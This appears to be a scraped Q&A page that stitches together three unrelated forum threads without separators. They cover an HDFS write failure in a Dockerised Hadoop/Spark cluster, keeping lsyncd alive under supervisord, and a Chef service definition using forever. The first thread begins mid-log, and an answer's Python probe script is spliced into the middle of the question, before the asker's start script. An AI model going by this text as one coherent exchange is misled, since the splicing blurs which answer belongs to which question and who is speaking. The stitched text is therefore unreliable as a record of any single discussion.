2020-01-28 21:39:03 DEBUG AbstractCoordinator:833 - [Consumer clientId=consumer-1, groupId=spark-kafka-source-d50ae41c-0b12-45c2-838f-c83c7a7e856d-1198433466-driver-0] Sending Heartbeat request to coordinator 192.168.1.156:9092 (id: 2147482646 rack: null)
2020-01-28 21:39:03 DEBUG AbstractCoordinator:846 - [Consumer clientId=consumer-1, groupId=spark-kafka-source-d50ae41c-0b12-45c2-838f-c83c7a7e856d-1198433466-driver-0] Received successful Heartbeat response
I am really stuck. I would be grateful for any hint.
Thank you.
Andreas
Edit:
OK, after some time it fails with the following message:
2020-01-28 22:20:21 INFO ShutdownHookManager:54 - Deleting directory /private/var/folders/9g/24386ccd2lg11pqzxj2w5f0r0000gn/T/spark-f5efe1d0-c8d1-4b6b-bb60-352114a9cf2d
2020-01-28 22:20:21 INFO ShutdownHookManager:54 - Deleting directory /private/var/folders/9g/24386ccd2lg11pqzxj2w5f0r0000gn/T/temporaryReader-3bdb4248-1e34-460c-b0d0-78c01460ff63
2020-01-28 22:20:21 INFO ShutdownHookManager:54 - Deleting directory /private/var/folders/9g/24386ccd2lg11pqzxj2w5f0r0000gn/T/temporary-d59aa3d8-d255-4134-9793-20a892abaf38
2020-01-28 22:20:21 ERROR DFSClient:930 - Failed to close inode 16620
org.apache.hadoop.ipc.RemoteException(java.io.IOException): File /data/bigdata/tweets/_temporary/0/_temporary/attempt_20200128221820_0001_m_000000_1/part-00000-3e620934-eae5-4235-8a7b-2de07b269e8e-c000.snappy.parquet could only be written to 0 of the 1 minReplication nodes. There are 2 datanode(s) running and 2 node(s) are excluded in this operation.
at org.apache.hadoop.hdfs.server.blockmanagement.BlockManager.chooseTarget4NewBlock(BlockManager.java:2135)
at org.apache.hadoop.hdfs.server.namenode.FSDirWriteFileOp.chooseTargetForNewBlock(FSDirWriteFileOp.java:294)
at org.apache.hadoop.hdfs.server.namenode.FSNamesystem.getAdditionalBlock(FSNamesystem.java:2771)
at org.apache.hadoop.hdfs.server.namenode.NameNodeRpcServer.addBlock(NameNodeRpcServer.java:876)
So is this a Docker issue? How can I map my containers to my host?
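One way to narrow this down: the DEBUG log shows the client being handed datanode addresses on the Docker network (172.18.1.2:9866 and 172.18.1.3:9866) and then going quiet after "Connecting to datanode", while the start script publishes several ports but not 9866. A minimal Python sketch, meant to be run on the machine where the Spark driver runs, checks whether those addresses accept TCP connections at all. probe is a hypothetical helper, and the addresses are the ones from the log.

```python
import socket


def probe(addresses, timeout=3.0):
    """Map each (host, port) pair to True if a TCP connection succeeds."""
    results = {}
    for host, port in addresses:
        try:
            with socket.create_connection((host, port), timeout=timeout):
                results[(host, port)] = True
        except OSError:
            # Refused, timed out, or no route to the address.
            results[(host, port)] = False
    return results


# Datanode addresses from the "pipeline = ..." lines of the DEBUG log.
DATANODES = [("172.18.1.2", 9866), ("172.18.1.3", 9866)]

# Usage:
#   for address, reachable in probe(DATANODES).items():
#       print(address, "reachable" if reachable else "NOT reachable")
```

If both come back unreachable, the namenode call succeeds but the block write cannot, which would fit the "2 node(s) are excluded" message. Running the job inside the Docker network, or making the datanodes reachable from the host (HDFS has a client setting, dfs.client.use.datanode.hostname, that may help here), would be the directions to look in.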
My starting script:
#!/bin/bash
# Bring the services up
function startServices {
docker start nodemaster node2 node3
sleep 5
echo ">> Starting hdfs ..."
docker exec -u hadoop -it nodemaster start-dfs.sh
sleep 5
echo ">> Starting yarn ..."
docker exec -u hadoop -d nodemaster start-yarn.sh
sleep 5
echo ">> Starting MR-JobHistory Server ..."
docker exec -u hadoop -d nodemaster mr-jobhistory-daemon.sh start historyserver
sleep 5
echo ">> Starting Spark ..."
docker exec -u hadoop -d nodemaster start-master.sh
docker exec -u hadoop -d node2 start-slave.sh nodemaster:7077
docker exec -u hadoop -d node3 start-slave.sh nodemaster:7077
sleep 5
echo ">> Starting Spark History Server ..."
docker exec -u hadoop nodemaster start-history-server.sh
sleep 5
echo ">> Preparing hdfs for hive ..."
docker exec -u hadoop -it nodemaster hdfs dfs -mkdir -p /tmp
docker exec -u hadoop -it nodemaster hdfs dfs -mkdir -p /user/hive/warehouse
docker exec -u hadoop -it nodemaster hdfs dfs -chmod g+w /tmp
docker exec -u hadoop -it nodemaster hdfs dfs -chmod g+w /user/hive/warehouse
sleep 5
echo ">> Starting Hive Metastore ..."
docker exec -u hadoop -d nodemaster hive --service metastore
echo "Hadoop info @ nodemaster: http://172.18.1.1:8088/cluster"
echo "DFS Health @ nodemaster : http://172.18.1.1:50070/dfshealth"
echo "MR-JobHistory Server @ nodemaster : http://172.18.1.1:19888"
echo "Spark info @ nodemaster : http://172.18.1.1:8080"
echo "Spark History Server @ nodemaster : http://172.18.1.1:18080"
}
function stopServices {
echo ">> Stopping Spark Master and slaves ..."
docker exec -u hadoop -d nodemaster stop-master.sh
docker exec -u hadoop -d node2 stop-slave.sh
docker exec -u hadoop -d node3 stop-slave.sh
echo ">> Stopping containers ..."
docker stop nodemaster node2 node3 psqlhms
}
if [[ $1 = "start" ]]; then
docker network create --subnet=172.18.0.0/16 hadoopnet # create custom network
# Starting PostgreSQL Hive metastore
echo ">> Starting postgresql hive metastore ..."
docker run -d --net hadoopnet --ip 172.18.1.4 --hostname psqlhms --name psqlhms -it postgresql-hms
sleep 5
# 3 nodes
echo ">> Starting nodes master and worker nodes ..."
docker run -d --net hadoopnet --ip 172.18.1.1 --hostname nodemaster -p 9083:9083 -p 9000:9000 -p 7077:7077 -p 8080:8080 -p 8088:8088 -p 50070:50070 -p 6066:6066 -p 4040:4040 -p 20002:20002 --add-host node2:172.18.1.2 --add-host node3:172.18.1.3 --name nodemaster -it hive
docker run -d --net hadoopnet --ip 172.18.1.2 --hostname node2 -p 8081:8081 --add-host nodemaster:172.18.1.1 --add-host node3:172.18.1.3 --name node2 -it spark
docker run -d --net hadoopnet --ip 172.18.1.3 --hostname node3 -p 8082:8081 --add-host nodemaster:172.18.1.1 --add-host node2:172.18.1.2 --name node3 -it spark
# Format nodemaster
echo ">> Formatting hdfs ..."
docker exec -u hadoop -it nodemaster hdfs namenode -format
startServices
exit
fi
if [[ $1 = "stop" ]]; then
stopServices
docker rm nodemaster node2 node3 psqlhms
docker network rm hadoopnet
exit
fi
if [[ $1 = "uninstall" ]]; then
stopServices
docker rmi hadoop spark hive postgresql-hms -f
docker network rm hadoopnet
docker system prune -f
exit
fi
echo "Usage: cluster.sh start|stop|uninstall"
echo " start - start existing containers"
echo " stop - stop running processes"
echo " uninstall - remove all docker images"
I'm trying to run my lsyncd script under supervisord so that it is always running.
I've written this conf for supervisor:
[program:autostart_lsyncd]
command=bash -c "lsyncd /home/sync/lsyncd_script.lua"
autostart=true
autorestart=unexpected
numprocs=1
startsecs = 0
stderr_logfile=/var/log/autostart_sync.err.log
stdout_logfile=/var/log/autostart_sync.out.log
The script starts fine, but it always exits:
2018-04-09 09:48:49,638 INFO success: autostart_lsyncd entered RUNNING state, process has stayed up for > than 0 seconds (startsecs)
2018-04-09 09:48:49,639 INFO exited: autostart_lsyncd (exit status 0; expected)
I can't tell whether this is the correct way to keep an lsyncd script alive.
Any suggestions?
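I'm using this supervisord configuration, in the file /etc/supervisor/conf.d/lsyncd.conf. Note the -nodaemon flag: lsyncd detaches into the background by default, so supervisord sees the process it launched exit right away with status 0; with -nodaemon, lsyncd stays in the foreground where supervisord can monitor it.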
[program:lsyncd]
command=/usr/bin/lsyncd -nodaemon /etc/lsyncd/lsyncd.conf.lua
autostart=true
autorestart=unexpected
startretries=3
And this configuration for lsyncd (/etc/lsyncd/lsyncd.conf.lua):
settings {
logfile = "/var/log/lsyncd/lsyncd.log",
statusFile = "/var/log/lsyncd/lsyncd.status"
}
sync {
default.rsync,
source="/var/www/html/sites/default/files",
target="root@cdn:/var/www/html/sites/default/files",
exclude = {"*.php", "*.po", "\.ht*"},
rsync = {
archive = false,
acls = false,
compress = true,
links = false,
owner = false,
perms = false,
verbose = true,
rsh = "/usr/bin/ssh -p 22 -o StrictHostKeyChecking=no"
}
}
I had also configured SSH keys and installed rsync on the servers.
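The difference between the supervisord config in the question and the one in this answer comes down to whether lsyncd stays in the foreground. A rough Python sketch that flags program sections launching lsyncd without -nodaemon follows. The function name is made up, the two config strings are shortened copies of the ones above, and the substring check is deliberately naive.

```python
import configparser


def lsyncd_programs_without_nodaemon(conf_text):
    """Return names of [program:x] sections that run lsyncd without -nodaemon."""
    # interpolation=None so that any % characters in values are left alone.
    parser = configparser.ConfigParser(interpolation=None)
    parser.read_string(conf_text)
    flagged = []
    for section in parser.sections():
        if not section.startswith("program:"):
            continue
        command = parser.get(section, "command", fallback="")
        # Naive substring checks; good enough for a quick sanity check.
        if "lsyncd" in command and "-nodaemon" not in command:
            flagged.append(section.split(":", 1)[1])
    return flagged


QUESTION_CONF = """
[program:autostart_lsyncd]
command=bash -c "lsyncd /home/sync/lsyncd_script.lua"
autorestart=unexpected
startsecs = 0
"""

ANSWER_CONF = """
[program:lsyncd]
command=/usr/bin/lsyncd -nodaemon /etc/lsyncd/lsyncd.conf.lua
autorestart=unexpected
"""

print(lsyncd_programs_without_nodaemon(QUESTION_CONF))
print(lsyncd_programs_without_nodaemon(ANSWER_CONF))
```

Only the question's program is flagged, which matches the "exit status 0; expected" line in its log.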
I'm trying to launch a node process as a service using forever, but the configuration is not working correctly. What's wrong with it?
execute "npm install -g forever"
restart_command_string = "forever restart /#{studio_server_folder}/#{studio_server_script}"
reload_command_string = "forever restart /#{studio_server_folder}/#{studio_server_script}"
start_command_string = "forever start /#{studio_server_folder}/#{studio_server_script}"
stop_command_string = "forever stop /#{studio_server_folder}/#{studio_server_script}"
status_command_string = "if [ $(forever list | grep -c \"studio-server\") -gt 0 ]; then echo 1; else echo 0; fi"
# execute "if [ $(forever list | grep -c \"studio-server\") -gt 0 ]; then #{restart_command_string}; else #{start_command}; fi"
service 'studio-server' do
supports :status => true, :restart => true, :reload => true
start_command start_command_string
reload_command reload_command_string
stop_command stop_command_string
status_command status_command_string
restart_command restart_command_string
action [:start]
end
execute 'service --status-all >> /servicestatus'
That status command isn't a command; it is a fragment of a bash script, and so it is unlikely to work. In general, I would highly recommend using a real service manager such as supervisord or systemd.